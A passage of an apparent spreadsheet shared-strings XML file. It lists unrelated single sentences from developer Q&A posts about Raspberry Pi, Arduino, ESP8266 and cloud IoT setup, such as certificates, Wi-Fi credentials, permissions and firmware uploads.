    <t>I have connected my circuit via usb to my computer, so that I can read serially the data that Arduino is processing for the fingerprint scanner.</t>
  </si>
  <si>
    <t>I am making a web app that lets me stream video to and from a raspberry pi while also letting me send keycodes.</t>
  </si>
  <si>
    <t>Flash params set to 0x004f
Compressed 3856 bytes to 2763...
Wrote 3856 bytes (2763 compressed) at 0x00000000 in 0.3 seconds (effective 119.6 kbit/s)...
Hash of data verified.</t>
  </si>
  <si>
    <t>In my project I read the unique ID from an RFID tag, the result is in the form .</t>
  </si>
  <si>
    <t>I downloaded IOT agent cumulocity-rpi-agent-latest.deb and installed using the following 2 commands
I registered the device in cumulocity platform.</t>
  </si>
  <si>
    <t>Other options I thought about include:
Build a custom control which derives from a TextBox and let it register itself to the OSK.</t>
  </si>
  <si>
    <t>I managed to establish the connection successfully but after running the application for sometime(about 20-25 minutes), if I try to connect my android device to the Pi, the two devices are unable to connect.</t>
  </si>
  <si>
    <t>My question is, is this only a restriction for the test-invoke-authorizer command or does this limit also apply for the real thing?</t>
  </si>
  <si>
    <t>From what I can understand, Modbus TCP packets contain the RTU information being sent, with the ID removed and MBAP in it's place, and the CRC removed.</t>
  </si>
  <si>
    <t>I am trying to setup a captive portal on my raspbian stretch access point connecting to my node server.</t>
  </si>
  <si>
    <t>If I root, how can I disable the ping or send imaginary response to the ping when I connect ethernet cable?</t>
  </si>
  <si>
    <t>What exclusions should I create so that I can leave 'Real-time' protection running?</t>
  </si>
  <si>
    <t>But I have some questions
How can we enroll multiple devices to the Group Enrollment using the test 
certificate created?</t>
  </si>
  <si>
    <t>I understand that AWS boto3 let's us set an environment variable to specify a non-standard path to the credentials file.</t>
  </si>
  <si>
    <t>1000s of packages are stolen everyday so for my science fair project I am building a thing that goes on peoples porches.</t>
  </si>
  <si>
    <t>For some unavoidable reasons, we receive invalid JSON payload from time to time which causes deserialisation fail in subscribers of EventHub.</t>
  </si>
  <si>
    <t>I'm setting a new device on Azure IoT devices, and instead of uploading certification manually i want to be able upload it via code.</t>
  </si>
  <si>
    <t>I added a configuration to deploy the application to a "local" raspberry via Ethernet connection on a private network.</t>
  </si>
  <si>
    <t>I have the SSID and the password for her wifi so is there anyway I can get the clock program to check for wifi and then enter the credentials and after its connected to continue with the program?</t>
  </si>
  <si>
    <t>I understand opening things up this way is a big security hole, but again, security is not an issue in this case.</t>
  </si>
  <si>
    <t>I'm using an ESP8266 in access point mode to send it some data (wifi credentials) from a mobile app via HTTP.</t>
  </si>
  <si>
    <t>The only thing that works is running the program as root:
@reboot /home/username/launcher.sh &gt;&gt; /home/username/crontab.log 2&gt;&amp;1
But it's a bad idea, from the security perspective.</t>
  </si>
  <si>
    <t>I would argue that with the proper shield to provide the ethernet interface TCP would be an acceptable choice.</t>
  </si>
  <si>
    <t>So I wouldn't be at all surprised if you hit some undocumented limit to the number of tracks you can load in at one time.</t>
  </si>
  <si>
    <t>Like @Madbreaks said: You might be able to write your own with some of the solutions presented in Stack Overflow question Authentication for new Twitter API 1.1.</t>
  </si>
  <si>
    <t>If not, you are not connected to internet, and need to either install a wireless card via USB or connect a network cable.</t>
  </si>
  <si>
    <t>Requirements of the Ethernet shield on the Uno and Mega 2560 R3 are:
On both boards, pin 10 is used to select the W5100 and pin 4 for the
  SD card.</t>
  </si>
  <si>
    <t>You shouldn't use a front-end framework like AngularJS to make calls to the Riot Games API, as this exposes your API key to your users.</t>
  </si>
  <si>
    <t>If you want to send encrypted messages from Android to Arduino, you have to make sure that you use the same parameters in both ends.</t>
  </si>
  <si>
    <t>You should then of course have that access point network fire-walled from your home "private" network with a DMZ network machine to communicate with the "Things".</t>
  </si>
  <si>
    <t>If you don't mind jailbreaking your iOS device, a few of the pins in the 30-pin connector (available from Sparkfun, including a break-out board) are standard RS-232.</t>
  </si>
  <si>
    <t>It's really quite awesome: http://beagleboard.org/pru
Raspberry Pi doesn't have anything similar with real time/reliability guarantees.</t>
  </si>
  <si>
    <t>If your concern is somebody taking the Raspberry and reading the password from the disk (or card, in case of a Pi), you could try and keep it in memory only.</t>
  </si>
  <si>
    <t>All normal and dangerous permissions declared in your app's manifest are granted at install time.</t>
  </si>
  <si>
    <t>From the release notes:
Dangerous permissions requested by apps are not granted until the next device reboot.</t>
  </si>
  <si>
    <t>CAfile: /etc/ssl/certs/ca-certificates.crt CRLfile: none in my searching, it was pointed out to me in chat, and one of the suggestions was to check the clock.</t>
  </si>
  <si>
    <t>However, regarding issue #2, the Peripheral I/O APIs do not currently expose SPI1 in Android Things DP2.</t>
  </si>
  <si>
    <t>to do the face detection ; But with a webcam you would need a raspberry pi or any other single board pc with enough CPU &amp; GPU to do the job.</t>
  </si>
  <si>
    <t>You're really posing at least two separate questions here, and I can help you right away with one...
Just write the SSID and password to EEPROM using a different sketch, and then in your working sketch, merely read the values from EEPROM in .</t>
  </si>
  <si>
    <t>By using the basic library for ESP it already occupies some memory for the configuration and firmware settings.</t>
  </si>
  <si>
    <t>If that's too heavy handed then look into using access tokens through OAuth 2.0 which can be used as a proxy for credentials and revoked independently of them.</t>
  </si>
  <si>
    <t>The stupid answer to this question is that I eventualy switched the programs between the boards, so both of them was running with an 'almost' identical (ESSID and password) Access Point.</t>
  </si>
  <si>
    <t>I created tiny library (70 lines of code) to store your own ID in EEPROM memory and verify it later.</t>
  </si>
  <si>
    <t>So now like this you can pass email id and password as payload in a decodable encrypted form to your things app from the normal android app.</t>
  </si>
  <si>
    <t>Plugging in ethernet cables does not ensure that your computer has recognized the connection.</t>
  </si>
  <si>
    <t>However if you can configure a "chip select" (CS), "slave select" (SS) or "chip enable" (CE) signal in the library, then this is where you specify, which GPIO you're using as /CS for the device in question.</t>
  </si>
  <si>
    <t>Based on the description, it seems that you want public the hardware info via the web API.</t>
  </si>
  <si>
    <t>The fingerprint thing is to allow you to verify that you're really talking to the correct web site.</t>
  </si>
  <si>
    <t>Essentially you need to validate every response from every command and flush the serial port before every write.</t>
  </si>
  <si>
    <t>It would then allow you to push firmware updates to it, or change the password via a web API.</t>
  </si>
  <si>
    <t>Certificates aren't attached to requests unless a specific server requires it, and at that point the certificate would come from the API vendor, not from the device OS.</t>
  </si>
  <si>
    <t>The problem you are running into is that without accurate time set before making the API request, Android thinks the TLS certificate coming from the server has expired.</t>
  </si>
  <si>
    <t>The watchdog timer needs to be reset periodically so that this doesn't happen - it helps detect firmware which has crashed.</t>
  </si>
  <si>
    <t>In case you cannot change the chip, then you would need to generate and program unique ID into your chip yourself.</t>
  </si>
  <si>
    <t>5) ONLY create a UUID associated with the pi/user when its my FIRST time loading the app OR creating an account.</t>
  </si>
  <si>
    <t>You won't have the certificates to prove you're www.google.com so the browser will strongly advise the user that something bad is happening and they shouldn't proceed.</t>
  </si>
  <si>
    <t>As you likely get callbacks for detected beacons and the frequency will not be high, I would have implemented it as one process.</t>
  </si>
  <si>
    <t>CookieManager is a public class in the Android API that manages the cookies used by an application's WebView instances.</t>
  </si>
  <si>
    <t>ASP.NET membership gives you a built-in way to validate and store user credentials.</t>
  </si>
  <si>
    <t>For questions relating to file read/write permissions, user groups, executable bits etc.</t>
  </si>
  <si>
    <t>Preventing source code being obtained, copied, read by various means such as obfuscation and encryption.</t>
  </si>
  <si>
    <t>Once the server has responded to the request, then if it executed differently there, the client state is patched up to match the server.</t>
  </si>
  <si>
    <t>Note: Beginning with Android 4.4, that permission is not required if you're reading or writing only files that are private to your app.</t>
  </si>
  <si>
    <t>Implementation of the Apache DefaultHttpClient that is configured with reasonable default settings and registered schemes for Android.</t>
  </si>
  <si>
    <t>Results of access point scans, containing enough information to make decisions about what access point to connect to.</t>
  </si>
  <si>
    <t>Shared contacts are visible to all users of an Apps domain and all Google services have access to the contact list.</t>
  </si>
  <si>
    <t>This tag covers permissions management on devices running Android 6.0 (API level 23) and higher.</t>
  </si>
  <si>
    <t>Features of Moya include:
Compile-time checking for correct API endpoint accesses.</t>
  </si>
  <si>
    <t>Finally, it should also be mentioned that and in addition to various bug fixes, GlassFish 4.1.1 also includes several security related fixes.</t>
  </si>
  <si>
    <t>Be carefull not to push sensitive data or platform information (read/write tokens for example).</t>
  </si>
  <si>
    <t>Code generation is not required to read or write data files nor to use or implement RPC protocols.</t>
  </si>
  <si>
    <t>If the request included authentication credentials, then the 401 response indicates that authorization has been refused for those credentials.</t>
  </si>
  <si>
    <t>Every app gets a unique set of live and test API credentials.</t>
  </si>
  <si>
    <t>Module developers can use Drupal's built-in Form API to provide a familiar, uniform, and secure user interface.</t>
  </si>
  <si>
    <t>I'm having a hard time deciding on which encryption to use for the messages send between a NFC-shield on an Arduino and a cellphone.</t>
  </si>
  <si>
    <t>My current code: (we only want to send a signal when onRecieve() is called)
Ive also give myself all the required permissions in my manifest.</t>
  </si>
  <si>
    <t>The code's purpose is to detect incoming chars and then activate an LED.</t>
  </si>
  <si>
    <t>Now i get the "Attempted to read or write protected memory" Exception.</t>
  </si>
  <si>
    <t>I try to establish passwords-less communication between mpi of my notes by using some video tutorial.</t>
  </si>
  <si>
    <t>Sometimes it will get as far as successfully authenticating the SMTP credentials with the server, and sometimes it will not even make the HELO before it shuts down.</t>
  </si>
  <si>
    <t>Are there any other solutions besides preparing a public server that provides a function to register a device and give them back the per-device access key?</t>
  </si>
  <si>
    <t>Users with any kind of account can read the current configuration settings.</t>
  </si>
  <si>
    <t>When trying to run it as a module I am getting following error (logs from docker):Using transport Mqtt_Tcp_Only
Unable to find a root certificate file at c:/mnt/edgemodule/edge-device-ca.cert.pem.</t>
  </si>
  <si>
    <t>I've created client side certificate for the device following https://aws.amazon.com/blogs/iot/just-in-time-registration-of-device-certificates-on-aws-iot/.</t>
  </si>
  <si>
    <t>Means, Android App should not detect and transmit any data packages(should not give SSID and Password) to any other esp8266 which is not mine.</t>
  </si>
  <si>
    <t>The problem is that to configure the Ethernet shield, the  call blocks for 60sec if the shield is not connected to the Internet.</t>
  </si>
  <si>
    <t>Simple JSON strings being written to Redis and read by SimpleHTTPServer by endpoint as described above.</t>
  </si>
  <si>
    <t>Every chip must have unique address, and this is doable according to Microchip's manual page 8.</t>
  </si>
  <si>
    <t>I made this file: /etc/systemd/system/getty@tty1.service.d/autologin.conf
And put this in it:
Give your username there without &lt;&gt; After that, I executed this:
Just reboot and see</t>
  </si>
  <si>
    <t>Another option is making the URL configurable (with a hidden option for example).</t>
  </si>
  <si>
    <t>You will have to make sure that you enable the ssh option to connect to your Raspberry Pi and you'll also need the IP address of the pi along with the login credentials.</t>
  </si>
  <si>
    <t>Array assignment
If you want to update the SSID and password during run-time, one option is to zero-initialize the array on startup - and then use strcpy() to update the values as needed.</t>
  </si>
  <si>
    <t>From the project description:
Pexpect can be used for automating interactive console applications such as ssh, ftp, passwd, telnet, etc.</t>
  </si>
  <si>
    <t>The source is then patched with the script file changes, and saved to a temporary file.</t>
  </si>
  <si>
    <t>DetectRTC is a JavaScript library for detecting WebRTC features, such as:
microphone availability
number of audio/video devices
IO device permissions</t>
  </si>
  <si>
    <t>Shortly after it was created, JSON validation was added following the description set out by Douglas Crockford of json.org in RFC 4627.</t>
  </si>
  <si>
    <t>But the code won'r work, I tried to tinker a few blocking things like the enable pin code where the shield is brought up etc.</t>
  </si>
  <si>
    <t>If I run nsupdate and specify rndc-key  and send a update add it successfully registers the name.</t>
  </si>
  <si>
    <t>But personally I only own a normal ethernet shield, so i can't provide a self-tested WiFi example.</t>
  </si>
  <si>
    <t>I can't verify code with compiler at the moment - please give me feedback if it doesn't work.</t>
  </si>
  <si>
    <t>(it does not show before because you need the credentials to query the available voices and formats).</t>
  </si>
  <si>
    <t>As I mentioned, even it's not needed at all I prefere to use my Github account to clearly identify my projects.</t>
  </si>
  <si>
    <t>However, a negative side-effect is that internal access may stop working!</t>
  </si>
  <si>
    <t>Using this option gives you the security and flexibility of using an intermediate CA, while limiting the use of the root CA itself (i.e.</t>
  </si>
  <si>
    <t>(password required)
And then load the program onto the Atmega with the following 2 commands.</t>
  </si>
  <si>
    <t>As far as I can tell, the CA certificate is successfully added to AWS IoT, activated and enabled for auto-registration.</t>
  </si>
  <si>
    <t>When I run the code I received following error:
Error: Invalid connect options supplied.</t>
  </si>
  <si>
    <t>My problem is i want to save a picture on a network path 
i have tried this:
But I get an error : Access denied.</t>
  </si>
  <si>
    <t>I can provide you a light-weight version of an agent which successfully enroll with the IoT server without any hassle in your google-glass.</t>
  </si>
  <si>
    <t>xda-developers
thread
that Android does not play nicely with ad-hoc networks unless rooted.</t>
  </si>
  <si>
    <t>The test button shows that there are no registered devices.</t>
  </si>
  <si>
    <t>UPDATE:
The exception I am receiving is as follows:
Error:"UserCancel", Description:"The WebAuthenticationBroker didn't return a code or an error.</t>
  </si>
  <si>
    <t>I am using ESP8266 with SMING ver2.1
To enable Access Point, I have the following code in 
The above code works fine.</t>
  </si>
  <si>
    <t>We found various different tutorials regarding OAuth2 authentification to access google spreadsheets from a python script.</t>
  </si>
  <si>
    <t>The ESP8266 has been flashed with NodeMCU firmware (the build has the following timestamp: ).</t>
  </si>
  <si>
    <t>I'm then supposed to type "python templogger_gdocs.py and it should take me to www.google.com/device and give me a code, but instead I get the following:
My question is how do I get the OAuth module I need to get the code?</t>
  </si>
  <si>
    <t>The documentation says that the tmr is still registered when stop is called.</t>
  </si>
  <si>
    <t>This is a stand alone project (art project, prop..whatever)..
And security is of NO CONCERN!..</t>
  </si>
  <si>
    <t>AWS documentation doesnt have a method to get the certificate attached to a particular thing.</t>
  </si>
  <si>
    <t>Created individual enrollment using X509Attestation as follows:  
b.</t>
  </si>
  <si>
    <t>The method imwrite() was saving over an already existing image without write permissions.</t>
  </si>
  <si>
    <t>And even it's not needed I will use the username pi to distinct the user from other project maintainers in the following example.</t>
  </si>
  <si>
    <t>One way would be to make a "naked" ISR that only saves the registers you change.</t>
  </si>
  <si>
    <t>The following line bothers me:
It implys you are loading a key not a certificate for your CA chain.</t>
  </si>
  <si>
    <t>Traceview is a graphical viewer for execution logs saved by an Android app.</t>
  </si>
  <si>
    <t>If not 
specified, it will unregister all routes for the given source.</t>
  </si>
  <si>
    <t>So I'm trying to figure out other options I have to disable the Alt key on this application.</t>
  </si>
  <si>
    <t>The line which gives the  and password in the Arduino sketch is as follows.</t>
  </si>
  <si>
    <t>Can anyone tell me where to obtain details about those codes and where to find them in datasheets?</t>
  </si>
  <si>
    <t>The weird thing was that it said that my jenkins is offline and I should configure a proxy.</t>
  </si>
  <si>
    <t>Therefore I'm not sure why I would have no permission on a project I owned and with a successfully updated action json.</t>
  </si>
  <si>
    <t>It should be working, but this error shows up:
I verified, but there is no 'tuple' in my code</t>
  </si>
  <si>
    <t>If you want to ssh to your pi from outside your place, you need to use port forwarding.</t>
  </si>
  <si>
    <t>I used the code of Charles Channon that put the instructions on Hacker.io.</t>
  </si>
  <si>
    <t>"Unable to verify the server's certificate.</t>
  </si>
  <si>
    <t>Still I upload new firmware in 4-5 takes.</t>
  </si>
  <si>
    <t>it was not possible to upload new firmware to arduino with usb cable only.</t>
  </si>
  <si>
    <t>OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response.</t>
  </si>
  <si>
    <t>A review by ars technica observed that popular VPN technologies such as OpenVPN and IPSEC are often complex to set up, disconnect easily (in the absence of further configuration), take substantial time to negotiate reconnections, may use outdated ciphers, and have relatively massive code (400,000 to 600,000 lines of code for the two examples given) which makes it harder to find bugs.</t>
  </si>
  <si>
    <t>I've written some pseudocode that should explain problem that I've discovered in my real application (Arduino 1.6 -  https://github.com/maciejmiklas/LEDDisplay):
I have structure:  which is larger than 16 bytes, so I've decided to pass it by pointer instead of by value - it works as expected.</t>
  </si>
  <si>
    <t>explains how atomic RMW operations are typically implemented in modern x86, by holding a cache line in Modified state between the load and store, not responding to Invalidate or RFOs until after the atomic transaction.</t>
  </si>
  <si>
    <t>The other easiest way to find IP of Raspberry PI would be:
to login to your router and then check under DHCP options what
computers are using what IPs
login to Raspberry PI, open terminal and write "ifconfig"</t>
  </si>
  <si>
    <t>While installing the alarm clock I didn't pay much attention to the access rights, I remember modifying some folders to full access by all users.</t>
  </si>
  <si>
    <t>I stripped the C program down to the minimum here to conserve space, but I verified correct return codes from all API calls.</t>
  </si>
  <si>
    <t>I'm trying to feed the watchdog device -  in Raspbian - from C. 
The problem is no matter how i try to access the device always throws busy or permission denied errors (as the process is already running and being fed by the system..).</t>
  </si>
  <si>
    <t>I have manually installed Mono v4.0.2
I have copied my app including:
npgsql.dll v2.2.5.0
npgsql.entityframework same version
mono.security  v4.0.2
and my app.config contains : 
So i'm wondering if npgsql librairies are correctly loaded, or a if a reference is missing.</t>
  </si>
  <si>
    <t>(my output was more less the same as on the screenshots in the tutorial)
However, trying to run any of the examples built, results in just one line: Illegal instruction 
What more can I provide...</t>
  </si>
  <si>
    <t>I did some troubleshooting by haveing some initialization commands in the Serial Monitor which stated the screen has been enabled and the RA8875 was detected.</t>
  </si>
  <si>
    <t>Is it possible to use an ESP as a router AP without internet access and connect to it using an android app without dealing with this notification manually.</t>
  </si>
  <si>
    <t>I am concerned because the device is publicly accessible and someone could potentially take it, plug it into a computer and read the password from storage.</t>
  </si>
  <si>
    <t>For safety it reads the voltage of the battery and reads a temperature sensor of this cell.</t>
  </si>
  <si>
    <t>Trigger a custom device action registered to one PI from an Android phone attached to the same email address.</t>
  </si>
  <si>
    <t>To ensure that only Board B, and nobody else, will switch the relais on Board A, I want to implement some kind of challenge response authentication.</t>
  </si>
  <si>
    <t>However, in 2 weeks I will be demonstrating it in a place where I have no control over the wifi connection, and I don't want to be reliant on a potentially heavily firewalled network.</t>
  </si>
  <si>
    <t>Instead of the HTML attributes for the username box remaining the same every time the login page is accessed, they change slightly every time.</t>
  </si>
  <si>
    <t>I have to enroll multiple devices in Azure Device provisioning service and I am using group enrollment to achieve the same.</t>
  </si>
  <si>
    <t>In my function, I have to take this decision based on some custom payload which I need to send from the device at the time of registering itself to DPS.</t>
  </si>
  <si>
    <t>Resizing "userRecords" might be a different game but that can wait a little
One thing I forgot to mention was that I will need to size/resize the array ( holding username ) ONLY ONCE.</t>
  </si>
  <si>
    <t>If the list does not contain video, then the problem is that the privileges of the user that is running the original program do not include access to the video device.</t>
  </si>
  <si>
    <t>According to the RaspberryPi forums: 
Though I think some kernel hacking may be involved to control all of them, I believe this only works with the OK LED.</t>
  </si>
  <si>
    <t>Seems to work OK, although it doesn't address the underlying general question of how to robustly disable and re-enable USB from any state it might be in.</t>
  </si>
  <si>
    <t>Also, make sure to add the INTERNET permission to your Android manifest, otherwise your program won't be able to open up a socket.</t>
  </si>
  <si>
    <t>While this is explained on the android reference site, I want to emphasize its importance to avoid wasted time debugging deadlocks.</t>
  </si>
  <si>
    <t>As expected, he could run python via cron, he could use the @reboot feature and he could write to disk without any sort of permission issues.</t>
  </si>
  <si>
    <t>OR
2) You pass root credentials to the object every time you need a shell with root setup.</t>
  </si>
  <si>
    <t>If it is tampered with or stolen, you can assume the credentials are compromised, and you can then issue new credentials to your service.</t>
  </si>
  <si>
    <t>Plugin the OTG cable to the device (make sure you get it the right way round so that the OTG cable goes into the phone end) and then you should see the popup box for permissions.</t>
  </si>
  <si>
    <t>If you don't have a lot of customers who'll be using this specific thing, consider creating a different key for each one (so you can revoke access for specific customers or devices as you need to).</t>
  </si>
  <si>
    <t>For my project, a day and night doorway "security camera" that streams live to youtube, I chose a Raspberry Pi Zero W running raspbian (headless) and a camera module with auto IR switching capabilities and IR lights.</t>
  </si>
  <si>
    <t>In addition, the ASP.NET profile feature makes the user information available using a strongly typed API that you can access from anywhere in your application.</t>
  </si>
  <si>
    <t>Telescope is an open-source social news app (think Hacker News or Reddit clone) built with Meteor, a real-time JavaScript framework.</t>
  </si>
  <si>
    <t>Note that as of April 9, 2013, Microsoft no longer supports this version of SQL Server, to the point that even security patches are no longer created.</t>
  </si>
  <si>
    <t>The API provides methods to read and write from Dropbox securely, so your users can bring all their important files with them to your app.</t>
  </si>
  <si>
    <t>to provide the upper layers with a channel over which data can be exchanged in real-time with any client connected through the Web, even if protected by firewalls and proxies.</t>
  </si>
  <si>
    <t>They offer advertisers targeting based on various demographic information, including real-time targeting of users.</t>
  </si>
  <si>
    <t>The client side offers a high-level API with opportunities to register listeners to the server like to a GUI component.</t>
  </si>
  <si>
    <t>In iBeacon, youd usually assign a unique UUID to all of your beacons to easily filter them out from other peoples beacons.</t>
  </si>
  <si>
    <t>SonarQube.com allows to continuously inspect the quality of source code and detect bugs, vulnerabilities and code smells in more than 20 different languages.</t>
  </si>
  <si>
    <t>It may use self-modifying code and multiple entry points (even mid-instruction) for legitimate purposes or to foil reverse engineering.</t>
  </si>
  <si>
    <t>Model checking is a technique for automatically verifying correctness properties of finite-state systems.</t>
  </si>
  <si>
    <t>I have waited a long time still no output after 'NET: Registered protocol family 10'.</t>
  </si>
  <si>
    <t>The telemetry will be queried from the database and presented statically or near real time (with SignalR) by device type, location, by user privilages etc.</t>
  </si>
  <si>
    <t>as described here http://nilhcem.com/android-things/google-assistant-smart-home
But I'm not liking that solution much as it's inherently insecure.</t>
  </si>
  <si>
    <t>The notion of spoofing data for a real serial port is kinda funny, hard to spoof anything when you can see the opposite end of the cable.</t>
  </si>
  <si>
    <t>One caveat: a number of sensors on small boards (break-out boards) have pull up resistors on the SDA and SLC lines.</t>
  </si>
  <si>
    <t>To make sure that the API can only be accessed from allowed sources you can add a middleware to the REST API to use something like an API-key to control the access.</t>
  </si>
  <si>
    <t>change the read write privileges on /home/$users to a-w
This change is not needed if you add "allow_writeable_chroot=YES", and set the SELinux ftp_home_dir ON.</t>
  </si>
  <si>
    <t>There is an edge detection function block in LV, You can use this and grab a timestamp every time a rising edge is detected and then can determine the frequency from that calculation.</t>
  </si>
  <si>
    <t>When using AssumeRoleUsingWebIdentity for generating STS credentials, if you provide Role and Policy both then, function will provide the STS credentials with lowest possible privileges from both of them.</t>
  </si>
  <si>
    <t>The Autofac API extensions that enable scanning assemblies for types to register in the container.</t>
  </si>
  <si>
    <t>Registered alarms are retained while the device is asleep (and can optionally wake the device up if they go off during that time), but will be cleared if it is turned off and rebooted.</t>
  </si>
  <si>
    <t>I have installed Arch and am having problems with the auto login options within slim.conf.</t>
  </si>
  <si>
    <t>I have been testing the following product
http://thumbs2.ebaystatic.com/d/l225/m/mboWkBZlMUEWh7HE5iTGyAg.jpg
the module is correctly registered to the mobile network since I can the MSIDSN and it rings.</t>
  </si>
  <si>
    <t>Forgive me if I'm a bit of a newbie here, but I tried looking into the documentation for raspberry-gpio-python for information about event detection and multithreading, but I didn't understand it.</t>
  </si>
  <si>
    <t>I'm working currently on a authentication project using a Raspberry Pi 3 a Fingerprint Scanner - TTL (GT-511C3) and python as a programming language.</t>
  </si>
  <si>
    <t>I can successfully deploy the app to Raspberry pi and I got the 
java.lang.SecurityException: Caller lacks required permission
  com.google.android.things.permission.USE_PERIPHERAL_IO
error when app was initializing  port.</t>
  </si>
  <si>
    <t>Basically you need to have some authentication method (Facebook, Google, AWS Cognito, your own SSO service with SAML support) and then you need to do following steps:
Configure Cognito User Pool or Federated Identity Pool with your authentication method.</t>
  </si>
  <si>
    <t>After creating the group enrollment and the certificates, I'm stuck on a error related to the signing certificates not matching.</t>
  </si>
  <si>
    <t>Your mentions require OAuth authorization and aren't compatible with RSS feed readers as a result.</t>
  </si>
  <si>
    <t>Use the following acronym to help you remember: BADTIE
B ytes
A re
D ecoded
T ext
I s
E ncoded
and write it like bot.read_until("login: ".encode(),  timeout=None).</t>
  </si>
  <si>
    <t>:
Then I can access the interface by going to any web browser on my wifi network and typing:
Then log in with the default raspberry pi credentials (or whatever you changed them to):
user: pi 
password: raspberry
Enjoy webmin awesomeness!</t>
  </si>
  <si>
    <t>HTTPS gives you way more that confidentiality (not letting know what you are sending), it gives you sACCE (Server-Only Authenticated and Confidential Channel Establishment).</t>
  </si>
  <si>
    <t>I'm wondering what steps I should take to not give up any secrets before I make the image public?</t>
  </si>
  <si>
    <t>So far, I've figured out the arduino verification command uses arm-none-eabi-g++, since that is the compiler for SAM boards like Arduino  Due.</t>
  </si>
  <si>
    <t>Following failure messages were detected:
        + Specified cast is not valid.</t>
  </si>
  <si>
    <t>If so, I have the following question..
How to register the GPIO Pin 3 service routine??</t>
  </si>
  <si>
    <t>If I use echo value &gt; /sys/class/gpio/gpioxx/value the event is detected, but if I configure the pin as an input and connect it to 3v3 or 0V nothing is triggered.</t>
  </si>
  <si>
    <t>Did you do the step in the recipe that included copying the registered device info into device.cfg file on the pi?</t>
  </si>
  <si>
    <t>My windows-computer had (without me noticing) changed the network-settings thinking it wasn't in a safe/private network.</t>
  </si>
  <si>
    <t>The  doesn't execute or source your banner ssh_banner.sh as the documentation states:
Banner
The contents of the specified file are sent to the remote user before authentication is allowed.</t>
  </si>
  <si>
    <t>One thing to bare in mind is that the autostart location may be different depending on what user you're logged in as.</t>
  </si>
  <si>
    <t>The Pi always connects to the wifi (assuming the credentials input were correct) when we use it this way.</t>
  </si>
  <si>
    <t>I am assuming the function is not detecting the packet input.</t>
  </si>
  <si>
    <t>I'm using the following code, which allows me to enter commands:
I can see that it's registered:
AT+CREG?</t>
  </si>
  <si>
    <t>You don't need to give a value to the identifier, for example you wouldn't give a value to your #include guards.</t>
  </si>
  <si>
    <t>I finally gave up and just added a windows password to my share.</t>
  </si>
  <si>
    <t>Currently the screenshot show 0.16.2 which doesn't seem to match the device type you registered and what is specified in your code.</t>
  </si>
  <si>
    <t>After this the certificate is imported successfully in the SSL option in Chromium.</t>
  </si>
  <si>
    <t>The console application (which I plan to write) should be non-blocking.</t>
  </si>
  <si>
    <t>I have registered a handler for this in Linux driver code, but the handler is not being called since the interrupt is not being detected.</t>
  </si>
  <si>
    <t>I/AWS: Begin certificate load
I/AWS: Certificate keystorealfred01 found in keystore - using for MQTT.</t>
  </si>
  <si>
    <t>I have changed admin password to new one in all
  configuration files mentioned in documentation.</t>
  </si>
  <si>
    <t>I have beacons from kontakt.io and I would like to find the unique uuid so that I can use them for indoor positioning.</t>
  </si>
  <si>
    <t>I also came across the AWSIoTManager.createKeysAndCertificateFromCsr, but I also cannot figure out how to utilise it given the fact that I'm using the AWSIoTDataManager class instead.</t>
  </si>
  <si>
    <t>Having this done, I access via DAV to the folder, I log in correctly but I can't modify or write any file.</t>
  </si>
  <si>
    <t>I want to find out how to delete an IoT Device that has been registered with IoT and IoT Device Provisioning Service.</t>
  </si>
  <si>
    <t>Please be careful not to post your API key in any question.</t>
  </si>
  <si>
    <t>How do I upload firmware (microsemi) via the Spi port?</t>
  </si>
  <si>
    <t>Detect webcam is unplugged
Do you have any solutions?</t>
  </si>
  <si>
    <t>But using these credentials I am unable to Connect using the above packages.</t>
  </si>
  <si>
    <t>One place I would also look is your manifest to make sure that you got all the necessary permissions.</t>
  </si>
  <si>
    <t>cookielib.FileCookieJar: load and save cookies from a file.</t>
  </si>
  <si>
    <t>It provides the following features for registered application.</t>
  </si>
  <si>
    <t>I've found the Adafruit Cryptosuite fork which is a stripped-down SHA1 only fork of Cathedrow's library.</t>
  </si>
  <si>
    <t>Is there any way/method to SSH into my RPi regardless of the OS without having to delete the key each time from known_hosts?</t>
  </si>
  <si>
    <t>Error: Unable to load auth plugin "/etc/mosquitto/auth-plug.so".</t>
  </si>
  <si>
    <t>Edit1: After building the firmware with debug option ON.</t>
  </si>
  <si>
    <t>Helloworld.c
Makefile
I upload to raspberry via ssh and.</t>
  </si>
  <si>
    <t>I have tried all the ways I can find to detect keypresses in python on Raspberry Pi 3 but I can't get any to work.</t>
  </si>
  <si>
    <t>The reason is that many of the operations we do in cryptography are put in place to ensure the data hasnt been modified unless by the rightful owner(s) / user(s), or to detect / correct errors after data has been transmitted.</t>
  </si>
  <si>
    <t>Navigation View
The navigation drawer can be an important focal point for identity and navigation within your app and consistency in the design here can make a considerable difference in how easy your app is to navigate, particularly for first time users.</t>
  </si>
  <si>
    <t>I'm new to Arduino and I borrowed this code from http://www.instructables.com/id/Arduino-Basics-Making-Sound/step2/Playing-A-Melody/
When I try to verify the code, I get 
on the last line.</t>
  </si>
  <si>
    <t>I was trying to upgrade the wifi shield firmware as per the instructions provided on
http://arduino.cc/en/Hacking/WiFiShieldFirmwareUpgrading
But I am getting the messege as
How to provide root permission for dfu-programmer which I installed by
if that is the issue???</t>
  </si>
  <si>
    <t>Then, when it comes time to load more notes in to these arrays, I decrypt them from a string that represents the song and load them like this:
If I print out both of the noteFreq and noteDur variables, I get the expected values.</t>
  </si>
  <si>
    <t>Given that my network is offline with no access to the internet it is clear to me that my iPhone detected a captive portal as it presumably pings many websites in order to determine it's online status.</t>
  </si>
  <si>
    <t>I want to get kernel source code file name and line number of a kernel function from the function address that ftrace outputed on rapberry pi 3.</t>
  </si>
  <si>
    <t>I can change the Android application to show a dialog allowing the user to insert the pin, in such a way the application on Raspberry can verify the correctness of the pin and eventually close the socket, but this solution is obviously valid only for the devices with my application.</t>
  </si>
  <si>
    <t>The FS register (FSR) is set to 0xD when this error happens, which tells it's a Permission Error : http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0087e/Cihhhged.html
Other registers : FAR is 0xE80000B6, LR is 0xFFFFFFFF, PC is 0xE80000B6, PSR is 0x200001F1
My program uses FIQ and IRQ interrupts, and use the all the four cpu cores.</t>
  </si>
  <si>
    <t>If so - it tries to connect to access point, otherwise it run access point and http server itself and then user need to connect wifi and go to 192.168.4.1 in browser, to be able to select ssid and enter password.</t>
  </si>
  <si>
    <t>The problem I experience is, when I execute the program I wrote (I try to encrypt a message), I dont get a full encrypted message.</t>
  </si>
  <si>
    <t>Essentially, is there a way to write a python script on my windows PC that will have methods that can automatically interact with the pi as if it were through SSH?</t>
  </si>
  <si>
